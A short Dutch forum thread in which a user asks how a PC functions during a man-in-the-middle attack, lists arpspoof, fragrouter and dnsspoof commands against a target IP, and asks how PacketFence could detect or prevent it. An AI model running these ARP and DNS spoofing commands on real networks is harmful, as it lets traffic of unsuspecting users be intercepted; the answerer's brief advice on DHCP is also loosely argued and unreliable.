Functioneert je pc als een "gateway" achter een gateway wanneer je een MITM doet?

Toegevoegd na 8 minuten:
wanneer je dit verdeelt over 4 terminals

sudo apt-get install dsniff
sudo apt-get install fragrouter
sudo apt-get install ssldump
sudo arpspoof -t 1.1.1.2 1.1.1.1
sudo fragrouter -B1
sudo dnsspoof

Verwijderde gebruiker
14 jaar geleden

Het beste antwoord

Absoluut, anders gaat deze truc niet op.
De MITM moet het 'slachtoffer' voorzien van een nieuwe DNS, default gateway en nep DHCP server.
AWM
14 jaar geleden
Verwijderde gebruiker
14 jaar geleden
valt dit dan niet op bij de betreffende ISP?
AWM
14 jaar geleden
Je ISP merkt daar niet van. Je zit tussen je ISP en de te foppen client. Vandaar 'in the middle'....
Verwijderde gebruiker
14 jaar geleden
welk systeem kan je dan het beste implementeren op een netwerk om dit te voorkomen bij de clients?
ik gebruikte eerst packetfence op bepaalde netwerken maar heb net de het bovenstaande uitgeprobeerd op een test node en er kwam niks in de violation vlan. link packetfence:
http://www.packetfence.org/home.html
AWM
14 jaar geleden
Om te beginnen niet met DHCP werken.
Verwijderde gebruiker
14 jaar geleden
waarom niet ik zie namelijk niet de link tussen een dhcp server en een MITM attack.